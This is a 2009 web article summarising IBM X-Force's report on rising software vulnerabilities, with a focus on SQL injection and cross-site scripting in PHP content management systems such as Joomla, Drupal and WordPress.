Security: IBM Finds PHP Web Content Management Systems Vulnerable

By Greg Crites and Brice Dunwoodie Feb 5, 2009

6 comments

In its biannual report released Feb. 2, 2009, IBM's X-Force research group pointed out significant security threat trends as we enter 2009, and paid particular attention to vulnerabilities found in PHP web content management systems such as Joomla!, Drupal, TYPO3 and WordPress.

The report is pretty. It has over a hundred pages. It has lots of nifty charts and graphs. But let's take a closer look at the what the net impact is.

Damn FUD, but It's Getting Worse

We hate Threat Level Orange ~~neo-facist scare tactic~~ type messages as much as the next person, but facts are worth knowing. Vulnerabilities are getting more numerous. We are getting less safe on the Internets. There, we said it.

According to a recent article, 70 Percent of Top Sites Distribute or Link to Malware. According to the IBM report, 2008 was the first year where they saw more than 7,000 vulnerabilities reported, a 13.5% increase over 2007. In the 10 years of tracking this business, fully 19% of all vulnerabilities were reported in 2008.

Now, let's clarify what they are tracking. A vulnerability — in IBM's eyes — is "any computer-related vulnerability, exposure, or configuration setting that may result in a weakening or breakdown of the confidentiality, integrity, or accessibility of the computing system".

Threat severities were classified using the Common Vulnerability Scoring System (CVSS),an industry standard for rating vulnerabilities (see First.org for details).

SQL Injection a Huge Problem

In our popular article, How They Hack Your Website: Overview of Common Techniques, we talked a fair bit about SQL injection threats, what they are and how they are commonly executed.

IBM's research team highlights the ongoing threat of SQL injection attacts stating that 54.9% of disclosed vulnerabilities where found in web applications and that attackers continue to target web app vulnerabilities, especially via SQL injection, often to plant malware on unsuspecting website users.

The 2 leading categories of web application vulnerabilities were cross-site scripting (XSS) and SQL injection. And in 2008 it was SQL injection that displaced XSS as the leading type of issue. SQL injection weaknesses were up an impressive 134% over reported issues in 2007.

The report asserts that XSS vulnerabilities are less valuable to the attacker and perhaps therefore less dangerous than SQL injection.

Although cross-site scripting issues are also easy to discover, they are not as valuable to an attacker. They usually result in cookie theft, which provides the attacker with access to a victim’s account on the vulnerable Website. SQL injection, on the other hand, is often used to redirect the visitors from the vulnerable Website to the attacker’s Website where remote code execution exploits can be launched against the victim’s browser.

Who's Dirty? Most Used = Most Vulnerable

The report cites disclosed vulnerabilities in the year, which means the projects’ leaders were aware of and disclosed them. The chart of vendors indicates Microsoft acquires the top spot followed by Apple, Sun and the Joomla project. What stands out here is the correlation between sheer volume of use and the number of vulnerabilities disclosed.

That's not an earth shattering observation, but it does bear keeping in mind. It is also useful as a perspective, as we note that a project like Joomla has out-paced IBM, Oracle and Mozilla in the number of vulnerabilities.